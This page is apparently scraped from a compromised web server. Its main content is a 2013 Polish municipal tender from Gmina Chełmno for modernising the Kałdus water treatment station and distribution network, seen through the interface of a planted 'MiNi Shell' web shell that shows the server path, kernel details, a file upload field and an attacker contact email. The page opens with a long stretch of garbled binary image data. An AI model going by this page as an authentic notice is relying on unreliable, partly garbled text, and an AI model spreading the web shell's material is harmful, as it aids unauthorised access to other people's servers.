JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130131/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130131/42022-N-2013.html

<p class="kh_header"><b>Chełmno: Rozbudowa  stacji uzdatniania wody w miejscowości Kałdus wraz z modernizacją sieci wodociągowej rozdzielczej z przyłączami do budynków we wsi Kałdus.</b><br>
<b>Numer ogłoszenia: 42022 - 2013; data zamieszczenia: 31.01.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Chełmno , ul. Dworcowa 1, 86-200 Chełmno, woj. kujawsko-pomorskie, tel. 056 6861540, faks 056 6861540.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.bip.chelmno.ug.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rozbudowa  stacji uzdatniania wody w miejscowości Kałdus wraz z modernizacją sieci wodociągowej rozdzielczej z przyłączami do budynków we wsi Kałdus..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie 1 Rozbudowa i modernizacja stacji poboru i uzdatniania wody m. in.:
1.1.Przebudowa jednostopniowego odżelaziania wody na filtrację dwustopniową.
1.2.Przebudowa jednostopniowego pompowania wody na układ dwustopniowy ze zbiornikiem wyrównawczym poj. 150m3;
1.3.Wymiana zbiornika odżelaziacza dn 1800 i odmanganiacza dn 1800.
1.4.Przebudowa instalacji odprowadzania wód popłucznych.
1.5.Wymiana urządzeń napowietrzających.
1.6.Malowanie urządzeń technologicznych stacji.
1.7.Dezynfekcja wody lampą UV q=20m3/h.
1.8.Wykonanie instalacji elektrycznych i akp w budynku i poza budynkiem stacji wodociągowej.
1.9.Wymiana oświetlenia w budynku.
1.10.Wykonanie ogrzewania na bazie grzejników konwektorowych.
1.11.Wymiana szafy sterowniczej dla pracy stacji.
1.12.Prace modernizacyjne na terenie stacji wodociągowej SUW Kałdus:
- dobudowa zbiornika retencyjnego ze stali nierdzewnej o pojemności v = 150 m3;
- wykonanie przewodu wodociągowego ssącego O 160 HDPE długości 10 m;
- wykonanie przewodu kanalizacyjnego spustu i przelewu O 200 PVC długości 18 m;
- wykonanie przewodu wodociagowego tłocznego O 160 HDPE długości 10 m z instalacji technologicznej budynku stacji do zbiornika retencyjnego;
- wykonanie przewodu wodociągowego tłocznego do sieci wodociągowej O 160 PVC;
- zamontowanie zasuw odcinających dn 160 - 2 szt. dn 200 - 1 szt. w komorze zbiornika;
- wykonanie ogrodzenia terenu stacji segmentowego długości 294 m + 2 bramy wjazdowe;
- likwidacja istniejącego ogrodzenia długości 180 m;
- zamontowanie kabla sterowniczego dla sąd poziomu wody w zbiorniku retencyjnym;
- wykonanie przewodu wodociągowego tłocznego O 160 HDPE długości 37,0 m z odwiertu Nr 3 do stacji uzdatniania wody;
- wykonanie przewodu wodociągowego tłocznego O 160 HDPE długości 23,0 m z odwiertu Nr 4 do stacji uzdatniania wody;
- wykonanie drogi wewnętrznej z kostki brukowej szer. 4,0 m, długości 46,0 m - pow. 184 m2;
- wykonanie drogi wewnętrznej z kostki brukowej szer. 4,0 m, długości 25,0 m - pow. 100 m2;
- wykonanie chodnika z kostki brukowej szer. 1,0 m, długości 53 m - pow. 53 m2;
- wykonanie przewodu energetycznego i sterowniczego do zasilania studni Nr 3 i 4;
- oczyszczenie i renowacja istniejących zbiorników wód popłucznych;
- likwidacja odwiertów Nr 1 i 2 wraz z geologiczną dokumentacją likwidacji odwiertów;
- wykonanie i uzbrojenie odwiertów Nr 3 i 4 wraz z niezbędną dokumentacją;
- wykonanie obudów typu Lange dla odwiertów Nr 3 i 4,
- pompy głębinowe GBC.3.11Q-30m3/h H=90M Nn 13 kW - 2 szt.;
- wykonanie zieleni izolacyjnej po wewnętrznej stronie ogrodzenia;    
1.13.Prace budowlane na obiekcie budynku stacji wodociągowej SUW Kałdus:
- dobudowanie pomieszczenia na zbiorniki filtracyjne o wym. 3,36 x 8,86 m;  
 - wybicie otworu o wym. 2,40 x 4,40 m w ścianie z wykonaniem nadproża 2NP;
 - pokrycie dachu styropapą g. 20 cm i papą dwukrotnie - 73,18 m2;
 - skucie i wykonanie fundamentów pod zbiorniki filtracyjne - 2 kpl.;
 - wykonanie posadzki z płytek kwasoodpornych - 57,41 m2;
 - położenie płytek na ścianach budynku hali do wysokości 2 m - 54,24 m2,
 - docieplenie ścian zewnętrznych styropianem gr. 10 cm i tynkiem mineralnym - 85,6 m2;
 - docieplenie ścian zew. fundamentów styropianem gr. 10 cm i tynkiem mineralnym - 30,0 m2;
 - malowanie farbą wapienną tynków wewnątrz hali - 88,0 m2;
 - wymiana okien na okna plastikowe - 6 szt. (125/60 - 2 szt, 56/75 - 4 szt.);
 - wstawienie nowych okien plastikowych - 3 szt. (120/90);
 - wymiana drzwi wejściowych do budynku o wym 230/1,0;
 - wymiana drzwi wejściowych do hali technologicznej o wym. 230/1,37;
 - należy wykonać badania bakteriologiczne i rozszerzone wody ze zmodernizowanej SUW Kałdus,
 - na całość prac należy wykonać obsługę geodezyjną wraz z powykonawczą inwentaryzacją geodezyjną w 3 egzemplarzach;

Zadanie 2 Modernizacja sieci wodociagowej rozdzielczej z przyłączami do budynków wsi Kałdus:
 - rura HDPE O 160          - 1624 mb,
 - rura HDPE O 110       - 1950 mb,
 - rura HDPE O   90          - 1405 mb,
 - rura PE O 40                  - 1645 mb,
 - rura st.OC lub PE dn40  -   224 mb,
                          RAZEM:   6848 mb.
 - wodomierze: JSB 20 mm - 55 kpl, 50 mm - 1 kpl.;
 - hydranty nadziemne FI 80 mm - 16 szt.,
 - zasuwy FI 160 mm - 5 szt.,
 - zasuwy FI 100 mm - 5 szt.,
 - zasuwy FI 80 mm - 3 szt.
 - studnia wodomierzowa z kręgów żelbetowych dn 1500 z układem wodomierza dn 80 i trzech zasuw dn 100;
 - należy wykonać badanie bakteriologiczne i rozszerzone wody  w zmodernizowanym wodociągu,
 - na całość prac należy wykonać obsługę geodezyjną wraz z powykonawczą inwentaryzacją geodezyjną w 3 egzemplarzach;.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość  udzielenia zamówienia uzupełniającego, zgodnie z art. 67 ust. 1 pkt 6 ustawy, do 50% wartości zamówienia podstawowego.
Zakres prac: CPV 45.00.00.00-7 - Roboty budowlane, CPV 45.23.11.00-6 Ogólne roboty budowlane związane z budową rurociągów, CPV 45.23.11.10-9 Kładzenie rurociągów, CPV 45.23.11.12-3 Instalacja rurociągów, CPV 45.23.11.13-0 Poziomowanie rurociągów, CPV 45.23.21.00-3 Roboty pomocnicze w zakresie wodociągów, CPV 45.23.21.50-8 Roboty w zakresie rurociągów do przesyłu wody, CPV 45.23.15.10-3 Rurociągi przesyłowe sprężonego powietrza, CPV 45.23.21.53-9 Roboty budowlane w zakresie wież wodnych, CPV 45.23.24.30-5 Roboty w zakresie uzdatniania wody, CPV 45.23.32.53-7 Roboty w zakresie nawierzchni dróg dla pieszych, CPV 45.25.56.00-5 Roboty w zakresie kładzenia rur w kanalizacji, CPV 45.31.00.00-3 Roboty w zakresie instalacji elektrycznych, CPV 45.31.11.00-1 Roboty w zakresie przewodów instalacji elektrycznej, CPV 45.11.12.00-0 Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.23.11.00-6, 45.23.11.10-9, 45.23.11.12-3, 45.23.11.13-0, 45.23.13.00-8, 45.23.21.00-3, 45.23.21.50-8, 45.22.31.00-7, 45.22.31.10-0, 45.23.15.10-3, 45.23.21.53-9, 45.23.24.30-5, 45.23.32.53-7, 45.25.56.00-5, 45.31.00.00-3, 45.31.11.00-1, 45.11.12.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.11.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Wykonawca jest zobowiązany do wniesienia wadium w wysokości: 40.000,00 zł (Słownie: czterdzieści tysięcy złotych).                  
2. Wadium może być wnoszone w:
           a) pieniądzu;
           b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
           c) gwarancjach bankowych;
           d) gwarancjach ubezpieczeniowych;
           e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz.1158 z późń. zm.).
3. Wadium musi być wniesione przed upływem terminu składania ofert. W przypadku  wadium wnoszonego w pieniądzu termin zostanie zachowany, jeżeli bank prowadzący rachunek Zamawiającego potwierdzi, że otrzymał przelew przed upływem terminu składania ofert. W takim przypadku dołączenie do oferty kopii polecenia przelewu wystawionego przez Wykonawcę jest warunkiem koniecznym, lecz nie wystarczającym do stwierdzenia, że wadium zostało wniesione w terminie.
W przypadku wniesienia wadium w formie innej niż pieniądz - oryginał dokumentu potwierdzającego wniesienie wadium należy złożyć przed upływem terminu składania ofert w siedzibie Zamawiającego, Chełmno, ul. Dworcowa 1, kasa pok. 312, a kserokopię dokumentu poświadczoną za zgodność z oryginałem należy załączyć do oferty.
Treść gwarancji lub poręczenia musi zawierać zapis dotyczący zatrzymania wadium z art. 46 ust. 4a ustawy Prawo zamówień publicznych, tj. Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3, nie złoży dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy Prawo zamówień publicznych, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie. 
  4. Brak takiego zapisu w gwarancji lub poręczeniu spowoduje odrzucenie oferty.
Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy Zamawiającego w banku: Bank Millennium Oddział Chełmno Nr 68 1160 2202 0000 0000 6087 8332 z adnotacją:
      Wadium -  Modernizacja wodociągu w Kałdusie. 
  5. Wykonawca, którego oferta została wybrana utraci wadium jeżeli zajdzie jakakolwiek z przesłanek wymienionych w art. 46 ust.5 pkt. 1-3 ustawy Prawo Zamówień Publicznych.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli Wykonawca wykonał w ciągu ostatnich pięciu lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej jedną robotę budowlaną polegającą na:
budowie lub modernizacji stacji poboru i uzdatniania wody o wartości nie mniejszej niż 800.000,00 zł - brutto, budowie sieci wodociągowych o wartości nie mniejszej niż 300.000,00 zł - brutto.
W/w warunek może być spełniony łącznie lub oddzielnie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli Wykonawca spośród osób skierowanych do realizacji zadania  będzie dysponował, co najmniej jedną osobą posiadającą ważne uprawnienia do kierowania robotami budowlanymi w specjalności:
konstrukcyjno - budowlanej,
instalacyjnej w zakresie sieci wodociagowych i kanalizacyjnych,
instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych.
Osoba, która będzie kierowała robotami powinna posiadać dwuletnie doświadczenie w kierowaniu robotami budowlanymi w/w specjalnościach. Warunek uznaje się za spełniony jeżeli Wykonawca przedstawi co najmniej jedną osobę posiadającą wszystkie wymienione uprawnienia lub kilka osób posiadających jedno lub kilka z wymienionych uprawnień. Osoby te łącznie powinny dysponować wszystkimi wymaganymi w specyfikacji uprawnieniami.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>-Formularz oferty,
-Oświadczenie w/s przekazania części zamówienia podwykonawcom,
-Przedmiar robót - Zadanie Nr 1,
-Przedmiar robót - Zadanie Nr 2,
-Wykaz osób uprawnionych do podpisywania ofert i podejmowania zobowiązań w imieniu Wykonawcy</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana umowy:
1.Wszelkie zmiany i uzupełnienia treści umowy, wymagają aneksu sporządzonego z zachowaniem formy pisemnej pod rygorem nieważności.
2.Zamawiający przewiduje możliwość wprowadzenia istotnych zmian do umowy w przypadkach:
a) gdy konieczność zmiany, w tym zakresie wysokości wynagrodzenia, związana jest ze zmianą powszechnie obowiązujących przepisów prawa (np. w zakresie zmiany wysokości podatku VAT);
b) jeżeli zmiana umowy dotyczyć będzie wartości wynagrodzenia dla Wykonawcy przedmiotu zamówienia ustalonego na podstawie kosztorysu powykonawczego; 
c) konieczności zmiany terminu realizacji w związku z:
- koniecznością wprowadzenia zmian w dokumentacji projektowej, a wynikających z konieczności dostosowania zakresu zadania do wytycznych programowych lub powszechnie obowiązujących przepisów prawa lub
- w przypadku wystąpienia niekorzystnych warunków atmosferycznych na podstawie protokołu podpisanego przez Inspektora nadzoru i Kierownika budowy - z zastrzeżeniem, iż okres wydłużenia terminu realizacji nie może być dłuższy niż okres trwania w/w warunków pogodowych powodujących brak możliwości prowadzenia robót lub
- działaniem siły wyższej w rozumieniu przepisów Kodeksu cywilnego lub
- nieterminowym, z przyczyn niezależnych do Wykonawcy, przekazania przez Zamawiającego terenu budowy Wykonawcy lub
- wstrzymaniem prac budowlanych przez właściwy organ z przyczyn niezawinionych przez Wykonawcę lub
- opóźnieniem związanym z uzyskiwaniem przez Wykonawcę niezbędnych w myśl ustawy Prawo budowlane dokumentów lub
- innymi okolicznościami niepowstałymi z winy Wykonawcy lub
- koniecznością wykonania zamówień dodatkowych,
c) jeżeli dotyczyć będzie zmian adresu, nazwy Wykonawcy, nr konta, nazwy banku itp.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.bip.chelmno.ug.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Chełmno
ul. Dworcowa 1
86-200 Chełmno
pok. 215.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.02.2013 godzina 12:00, miejsce: Urząd Gminy Chełmno
ul. Dworcowa 1
86-200 Chełmno
pok. 319.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Program Rozwoju Obszarów Wiejskich na lata 2007-2013 działanie Podstawowe usługi dla gospodarki i ludności wiejskiej.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com